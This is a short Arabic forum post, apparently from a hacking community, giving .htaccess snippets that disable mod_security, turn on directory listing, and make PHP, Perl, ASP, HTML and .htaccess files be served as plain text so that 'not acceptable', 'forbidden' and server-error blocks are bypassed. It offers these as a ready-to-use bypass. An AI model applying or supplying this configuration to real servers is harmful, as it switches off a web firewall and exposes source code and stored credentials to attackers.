اولا حط الهيتس دا لمنع not acceptable
كود:
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
تضع الهيتس دا لتخطي interal server error
كود:
DirectoryIndex seees.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddType text/plain .pl
AddType text/plain .asp
AddType text/plain .htm
AddType text/plain .shtml
AddType text/plain .shtm
AddType text/plain .htaccess
ثم الهيتس دا لمنع الفوربيدن
كود:
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
هدي هي الطريقة امتبعة لتخطيه جربها